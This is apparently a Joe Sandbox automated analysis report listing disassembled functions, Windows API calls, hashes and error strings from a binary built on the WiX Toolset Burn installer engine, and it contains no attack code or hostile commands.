                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000007,00000000,00000002,08000080,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?), ref: 009203E5
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 009203F3
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,Function_0003FC40,?), ref: 009204C1
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 009204D0
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                                            • String ID: BA aborted copy of payload from: '%ls' to: %ls.$Failed attempt to copy payload from: '%ls' to: %ls.$Failed to open destination file to copy payload from: '%ls' to: %ls.$Failed to open source file to copy payload from: '%ls' to: %ls.$Failed to prepare payload destination path: %ls$Failed to read from start of source file to copy payload from: '%ls' to: %ls.$copy$d:\a\wix4\wix4\src\burn\engine\apply.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 2528220319-3784852467
                                                                                                                                                                                                                                                                            • Opcode ID: c103c88ac3febc98394b5f1720064fb4beb1473f43b4ba89e5fca251c1f84b0d
                                                                                                                                                                                                                                                                            • Instruction ID: 732ff35d3588cd96d432a03a8b7d55332816010c48da27b5d4b0ded80cf6e475
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c103c88ac3febc98394b5f1720064fb4beb1473f43b4ba89e5fca251c1f84b0d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A9512A32A41339B7E7219A559C4AF6F396CFFC6B60F114105FA14BB2D2E2B49C0196A1
                                                                                                                                                                                                                                                                            Function 009196F3 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 175serviceCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,00000000,?,?,?,?,?,?,?,?,?,00919D0A,?), ref: 0091972C
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00919D0A,?,?,?), ref: 0091973B
                                                                                                                                                                                                                                                                            • OpenServiceW.ADVAPI32(00000000,wuauserv,00000027,?,?,?,?,?,?,?,?,00919D0A,?,?,?), ref: 00919795
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00919D0A,?,?,?), ref: 009197A1
                                                                                                                                                                                                                                                                            • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,00919D0A,?,?,?), ref: 009197E9
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00919D0A,?,?,?), ref: 009197F3
                                                                                                                                                                                                                                                                              • Part of subcall function 009198F9: ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00919898,00000000,00000003), ref: 00919910
                                                                                                                                                                                                                                                                              • Part of subcall function 009198F9: GetLastError.KERNEL32(?,00919898,00000000,00000003,00000000,?,?,?,?,?,?,?,?,?,00919D0A,?), ref: 0091991A
                                                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 009198D5
                                                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 009198E0
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Service$ErrorLast$CloseHandleOpen$ChangeConfigManagerQueryStatus
                                                                                                                                                                                                                                                                            • String ID: Failed to mark WU service to start on demand.$Failed to open WU service.$Failed to open service control manager.$Failed to query status of WU service.$Failed to read configuration for WU service.$d:\a\wix4\wix4\src\burn\engine\msuengine.cpp$wuauserv
                                                                                                                                                                                                                                                                            • API String ID: 2017831661-2546018573
                                                                                                                                                                                                                                                                            • Opcode ID: b6f036396604859bad3c3726abfaa49ec34a7baa21868610d3d8867bb90050c3
                                                                                                                                                                                                                                                                            • Instruction ID: 8b6af2debe15823e1b933d66b188a59927e989de618d4bd2a9a5ec1e0ec98a14
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6f036396604859bad3c3726abfaa49ec34a7baa21868610d3d8867bb90050c3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5151F836F40328A7E721DB698C59FEF7AB8AF46B10F154164FE05BB2C1D675DC4086A0
                                                                                                                                                                                                                                                                            Function 008E4456 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 142COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,?), ref: 008E446B
                                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000001,?,?,?), ref: 008E447A
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?), ref: 008E4484
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?), ref: 008E44C9
                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00000105,?,?,?), ref: 008E4509
                                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,?,?,?,?), ref: 008E4517
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?), ref: 008E4525
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?), ref: 008E45B4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$FileModuleName
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate space for module path.$Failed to get max length of input buffer.$Failed to get path for executing process.$Failed to get size of path for executing process.$Failed to re-allocate more space for module path.$Unexpected failure getting path for executing process.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\pathutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1026760046-3511924
                                                                                                                                                                                                                                                                            • Opcode ID: d9ba84792b01213536b8f1b6b96ddf5caa4c14fe03f88e615edec6b42b31eee2
                                                                                                                                                                                                                                                                            • Instruction ID: fdf18ed934aea76c3690bef107ba489c94890a74a9717f04ab0c9bb5e03f0937
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d9ba84792b01213536b8f1b6b96ddf5caa4c14fe03f88e615edec6b42b31eee2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F9412872E41265BBD7215B9A9C4EF7F796CFB07710F020120FE04FB281E2748D0096A1
                                                                                                                                                                                                                                                                            Function 009459D8 Relevance: 24.8, APIs: 5, Strings: 9, Instructions: 254registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(008E6CF2,008E6CF2,009031C1,00000000,008E6CF2,009031C1,00000000,00000001,00000000,00020019,008E6CF2,009031C1,009031C1,00020019,00000000,008E6CF2), ref: 00945B9C
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(008E6CF2,009031C1,009031C1,00020019,00000000,008E6CF2,00020019,009031C1,00000000,008E6CF2,-80000001,00000000,009031C1,009031C1,008E6CF2), ref: 00945C87
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,009031C1,009031C1,00020019,00000000,008E6CF2,00020019,009031C1,00000000,008E6CF2,-80000001,00000000,009031C1,009031C1,008E6CF2), ref: 00945C98
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(009031C1,009031C1,009031C1,00020019,00000000,008E6CF2,00020019,009031C1,00000000,008E6CF2,-80000001,00000000,009031C1,009031C1,008E6CF2), ref: 00945CA9
                                                                                                                                                                                                                                                                              • Part of subcall function 0093CC5E: RegQueryInfoKeyW.ADVAPI32(?,008F71DB,008E6DEA,008E7162,008E6EDE,80000002,SYSTEM\CurrentControlSet\Control\Session Manager\FileRenameOperations,00020019,00000000,008E6DEA,80000002,SYSTEM\CurrentControlSet\Control\Session Manager,PendingFileRenameOperations2,00000000,80000002,SYSTEM\CurrentControlSet\Control\Session Manager), ref: 0093CC85
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to get the number of dependent subkeys under the dependency "%ls"., xrefs: 00945B77
                                                                                                                                                                                                                                                                            • Failed to open the dependents subkey under the dependency "%ls"., xrefs: 00945AE9
                                                                                                                                                                                                                                                                            • Failed to delete the dependents subkey under the dependency "%ls"., xrefs: 00945BD9
                                                                                                                                                                                                                                                                            • Failed to get the number of values under the dependency "%ls"., xrefs: 00945C09
                                                                                                                                                                                                                                                                            • Failed to open root registry key "%ls"., xrefs: 00945A34
                                                                                                                                                                                                                                                                            • Failed to delete the dependent "%ls" under the dependency "%ls"., xrefs: 00945B3A
                                                                                                                                                                                                                                                                            • Failed to delete the dependency "%ls"., xrefs: 00945C62
                                                                                                                                                                                                                                                                            • Failed to open the registry key for the dependency "%ls"., xrefs: 00945A95
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp, xrefs: 00945A43, 00945B49
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close$InfoQuery
                                                                                                                                                                                                                                                                            • String ID: Failed to delete the dependency "%ls".$Failed to delete the dependent "%ls" under the dependency "%ls".$Failed to delete the dependents subkey under the dependency "%ls".$Failed to get the number of dependent subkeys under the dependency "%ls".$Failed to get the number of values under the dependency "%ls".$Failed to open root registry key "%ls".$Failed to open the dependents subkey under the dependency "%ls".$Failed to open the registry key for the dependency "%ls".$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 852846383-1164676106
                                                                                                                                                                                                                                                                            • Opcode ID: 540651466acd860358ccfc2583ebff6ea4f4add2dc0f486fc3baebbcc4bd797c
                                                                                                                                                                                                                                                                            • Instruction ID: 155f7466e633c5547f1b3edde28b1c74f46414435a1c6c95ea368616714a9f08
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 540651466acd860358ccfc2583ebff6ea4f4add2dc0f486fc3baebbcc4bd797c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A571E732E40F2AFBDB315ED48CCAF6F6A68EF40711F174629B915BA192D2748D40D6D0
                                                                                                                                                                                                                                                                            Function 0094A8DE Relevance: 24.7, APIs: 3, Strings: 11, Instructions: 249COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: GetProcessHeap.KERNEL32(?,00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E541C
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: RtlAllocateHeap.NTDLL(00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E5423
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 0094AB27
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 0094AB36
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 0094AB45
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to get unknown element value., xrefs: 0094AA03
                                                                                                                                                                                                                                                                            • Failed to allocate ATOM unknown element namespace., xrefs: 0094A968
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp, xrefs: 0094A90C, 0094A917, 0094A92C, 0094A977
                                                                                                                                                                                                                                                                            • Failed to allocate ATOM unknown element name., xrefs: 0094A9DF
                                                                                                                                                                                                                                                                            • Failed to enumerate all attributes on ATOM unknown element., xrefs: 0094AADE
                                                                                                                                                                                                                                                                            • Failed to get unknown element namespace., xrefs: 0094A989
                                                                                                                                                                                                                                                                            • Failed to allocate unknown element., xrefs: 0094A91D
                                                                                                                                                                                                                                                                            • Failed to parse attribute on ATOM unknown element., xrefs: 0094AAF2
                                                                                                                                                                                                                                                                            • Failed get attributes on ATOM unknown element., xrefs: 0094AA59
                                                                                                                                                                                                                                                                            • Failed to allocate ATOM unknown element value., xrefs: 0094AA2B
                                                                                                                                                                                                                                                                            • Failed to get unknown element name., xrefs: 0094A9BA
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FreeString$Heap$AllocateProcess
                                                                                                                                                                                                                                                                            • String ID: Failed get attributes on ATOM unknown element.$Failed to allocate ATOM unknown element name.$Failed to allocate ATOM unknown element namespace.$Failed to allocate ATOM unknown element value.$Failed to allocate unknown element.$Failed to enumerate all attributes on ATOM unknown element.$Failed to get unknown element name.$Failed to get unknown element namespace.$Failed to get unknown element value.$Failed to parse attribute on ATOM unknown element.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2724874077-2936770743
                                                                                                                                                                                                                                                                            • Opcode ID: 7e9b3cd431552cb323305c77fd67af9068a248420a0b5b0a68fdd8e583b85298
                                                                                                                                                                                                                                                                            • Instruction ID: 2783a74d73949859e389bf840d3b635bd7681f940ac02edcd55daaf6dee97486
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7e9b3cd431552cb323305c77fd67af9068a248420a0b5b0a68fdd8e583b85298
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A081CE75780716ABEB159B54CC09F6E777AEFC1B18F124058F605AB2E0EBB09E01CB52
                                                                                                                                                                                                                                                                            Function 008ED84A Relevance: 24.7, APIs: 2, Strings: 12, Instructions: 173COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,008E6570,?,?,008EE2FF,feclient.dll,?,00000000,00000000,?,?,?,008E6C5C,00000000), ref: 008ED854
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,008EE2FF,feclient.dll,?,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 008ED860
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorHandleLastModule
                                                                                                                                                                                                                                                                            • String ID: .wix$.wixburn$Bundle guid didn't match the guid in the PE Header in memory.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get module handle to process.$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$burn$clbcatq.dll$d:\a\wix4\wix4\src\burn\engine\section.cpp
                                                                                                                                                                                                                                                                            • API String ID: 4242514867-3704064587
                                                                                                                                                                                                                                                                            • Opcode ID: 36bf8b01b01772b9810c2c3f04b6de0dc0e3d6509eb646dc8a856089bedadb04
                                                                                                                                                                                                                                                                            • Instruction ID: 44543ce15f491a83037b4a3526947bee15546fa6721413d364f02bca8b5be5f2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 36bf8b01b01772b9810c2c3f04b6de0dc0e3d6509eb646dc8a856089bedadb04
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1C516771741360B7D721D5474C4AFAAA6A8FB57B69F118029FA18EB2C1E1E08E05C395
                                                                                                                                                                                                                                                                            Function 0090D137 Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 160COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0094699C: FindResourceExA.KERNEL32(?,0000000A,?,00000000), ref: 009469AD
                                                                                                                                                                                                                                                                              • Part of subcall function 0094699C: GetLastError.KERNEL32(?,0090D16B,?,00000001,?,?), ref: 009469B9
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000001,?,?), ref: 0090D2CD
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?), ref: 0090D2E2
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandle$ErrorFindLastResource
                                                                                                                                                                                                                                                                            • String ID: Failed to create UI thread.$Failed to create modal event.$Failed to load splash screen configuration.$Failed to read splash screen configuration resource.$Invalid splash screen type: %i$d:\a\wix4\wix4\src\burn\engine\splashscreen.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 3960716503-2819964678
                                                                                                                                                                                                                                                                            • Opcode ID: d48eb9b5a8ece545a3cae03e8fd526168971d1e7d6e6f0b92f298c88642d5253
                                                                                                                                                                                                                                                                            • Instruction ID: 78baa5aab2e847e02b964557dcf9de7d54d020c0274587051285c13a7f89aaad
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d48eb9b5a8ece545a3cae03e8fd526168971d1e7d6e6f0b92f298c88642d5253
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F41D675941615BFEB119BD98C49FAF76BDEB85714F110025FA20F72C0E6B49900CA61
                                                                                                                                                                                                                                                                            Function 008FF013 Relevance: 23.1, APIs: 2, Strings: 11, Instructions: 385COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008EA8A3: EnterCriticalSection.KERNEL32(008E7D5B,WixBundleOriginalSource,?,?,008FF8B4,8D4BE800,WixBundleOriginalSource,?,00000001,00000081,008E7D5B,?,00000001,008E7DDB,?,?), ref: 008EA8AF
                                                                                                                                                                                                                                                                              • Part of subcall function 008EA8A3: LeaveCriticalSection.KERNEL32(008E7D5B,008E7D5B,00000000,00000000,?,?,008FF8B4,8D4BE800,WixBundleOriginalSource,?,00000001,00000081,008E7D5B,?,00000001,008E7DDB), ref: 008EA934
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,?,WixBundleLastUsedSource,?), ref: 008FF087
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,?,WixBundleLastUsedSource,?), ref: 008FF0A4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareCriticalSectionString$EnterLeave
                                                                                                                                                                                                                                                                            • String ID: Failed to combine last source with relative.$Failed to combine last source with source.$Failed to combine layout source with relative.$Failed to combine layout source with source.$Failed to combine source process folder with relative.$Failed to combine source process folder with source.$Failed to copy absolute source path.$Failed to ensure size for search paths array.$WixBundleLastUsedSource$WixBundleOriginalSourceFolder$d:\a\wix4\wix4\src\burn\engine\cache.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1408779843-2177830281
                                                                                                                                                                                                                                                                            • Opcode ID: b3f83284096a2ef53525b984de3d834874cc420d67fd0812206c1039a31539ad
                                                                                                                                                                                                                                                                            • Instruction ID: fd87f6c41ba515e2f85d5296e7cb55fda67657a772608363bbfe3aa22fe5064d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b3f83284096a2ef53525b984de3d834874cc420d67fd0812206c1039a31539ad
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0AD17171A4062ABBDF21CE65CC49FAA7AA5FF08715F100165FB04FB2C1D7B0A940CB96
                                                                                                                                                                                                                                                                            Function 00942C90 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 259fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00943B63: GetFileSizeEx.KERNEL32(00000000,00000000,?,00000000,?,?,?,008EE202,0100147D,?,?,00000000,00000000), ref: 00943B7B
                                                                                                                                                                                                                                                                              • Part of subcall function 00943B63: GetLastError.KERNEL32(?,?,?,008EE202,0100147D,?,?,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 00943B85
                                                                                                                                                                                                                                                                            • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00920457,?,00000000,00000000,?,?,00920457,00000000,00000000,00000000,00000000), ref: 00942DAF
                                                                                                                                                                                                                                                                            • SetEndOfFile.KERNEL32(?,?,00920457,00000000,00000000,00000000,00000000,Function_0003FC40,?), ref: 00942DBB
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00920457,00000000,00000000,00000000,00000000,Function_0003FC40,?), ref: 00942DC5
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
